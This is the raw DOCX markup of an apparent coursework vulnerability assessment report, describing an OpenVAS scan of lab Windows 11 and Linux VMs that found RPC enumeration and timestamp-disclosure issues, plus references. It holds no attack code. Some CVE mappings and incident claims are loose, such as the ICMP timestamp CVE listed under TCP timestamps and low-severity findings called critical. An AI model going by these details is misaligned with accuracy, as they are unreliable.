          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Techniques and Sub-Techniques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved from https://attack.mitre.org.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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CVE-2019-0708. (2019). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Remote Desktop Services Remote Code Execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. National Vulnerability Database. Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="rId62" w:tooltip="https://nvd.nist.gov/vuln/detail/CVE-2019-0708" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvd.nist.gov/vuln/detail/CVE-2019-0708</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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VirusTotal. (2024). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Malware Hash Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="rId63" w:tooltip="https://www.virustotal.com/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.virustotal.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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2"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">SANS Institute. (2024). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Response and Forensics Best Practices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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Vulnerability Assessment Report for Cat’s Company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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Title:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vulnerability Assessment and Recommendations for Cat’s Company</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared By:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remilekun F.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Date:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">11/18/2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools Used:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> OpenVAS </w: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Table of Contents</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Executive Summary</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Scan Results</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Methodology</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Findings</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Risk Assessment</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Recommendations</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">References</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1. Executive Summary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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">On November 18, 2024, a vulnerability assessment was conducted on Cat’s Company’s Windows 11 VM and Linux Server using OpenVAS. The scans evaluated network services, configurations, and protocol vulnerabilities.Critical vulnerabilities such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">DCE/RPC enumeration</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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP timestamp information disclosure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP timestamp reply information disclosure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> were identified. These vulnerabilities expose the company to risks such as unauthorized data access and network reconnaissance. The report prioritizes vulnerabilities based on their impact on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Confidentiality, Integrity, and Availability (CIA)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> triad and provides mitigation strategies aligned with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST</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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> standards.</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2. Scan Results</w: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Windows 11 VM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(ip address 10.0.2.6) </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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DCE/RPC and MSRPC Services Enumeration</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Description: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Attackers can exploit open ports (e.g., 135, 139, 445) to enumerate system services and user accounts, leading to potential privilege escalation.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Impact: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Exposes sensitive system details, increasing the risk of lateral movement and data exfiltration.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The EternalBlue exploit (CVE-2017-0144) leveraged SMB vulnerabilities on Windows systems to spread WannaCry ransomware, impacting over 200,000 computers globally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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TCP Timestamps Information Disclosure</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Timestamp responses reveal system uptime, aiding attackers in OS fingerprinting and reconnaissance.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Provides critical data for timing attacks.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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TCP timestamp vulnerabilities were exploited in 2019 to analyze server workloads in cloud environments. CVE: CVE-1999-0524 </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ICMP Timestamp Reply Information Disclosure</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ICMP timestamp responses expose system time, facilitating network mapping and timing attacks.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Increases risk of precision attacks targeting specific systems.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Tools like Nmap use ICMP responses to map networks for targeted exploits. Mitre ATT&amp;CK ID: T1046 (Network Service Scanning)</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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5943600" cy="1094162"/>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82270" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId64"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="10941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68.00pt;height:86.15pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId64" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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Fig.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Openvas scan for Windows 11 Vm</w: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Linux Server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(ip address 10.0.2.15)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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TCP Timestamps Information Disclosure</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Reveals system uptime and clock skew, aiding reconnaissance. Similar to the Windows 11 vulnerability.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Assists attackers in reconnaissance activities and OS identification.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Attackers in 2020 used TCP timestamp leaks to target outdated Linux kernels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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5943600" cy="2333625"/>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68091" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId65"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="23336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68.00pt;height:183.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId65" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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Fig.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Openvas scan for Linux Server Vm</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3. Methodology</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Tool Used:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> OpenVAS, a vulnerability scanner used to detect security weaknesses via a Kali Linux.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Purpose:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identify vulnerabilities in network protocols, services, and configurations across the Windows 11(ip address 10.0.2.6) and Linux system (ip address 10.0.2.15) and simulate a real-world internal network assessment to expose potential entry points.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Environment:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scanned from an internal network to simulate a real-world threat scenario using a dedicated Kali VM.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>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4. Findings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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">What Was Scanned:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Windows 11 VM (IP: 10.0.2.6)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Server (IP: 10.0.2.15)</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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Both systems were scanned successfully. High-priority vulnerabilities on Windows 11 VM were related to service enumeration and timestamp disclosures, while the Linux Server exhibited timestamp disclosure vulnerabilities.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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilities Discovered</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rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">DCE/RPC Enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows 11)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Enumerates services and user accounts via open ports (135, 137-139, 445).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Used in the EternalBlue exploit to propagate ransomware like WannaCry.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Discovery Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Identified in the context of CVE-2017-0144.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Severe compromise of confidentiality and integrity.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rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP Timestamps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows 11 and Linux Server)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Leaks system uptime, aiding reconnaissance and OS identification.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Exploited in server-side timing attacks in cloud environments.</w:t>
      </w:r>
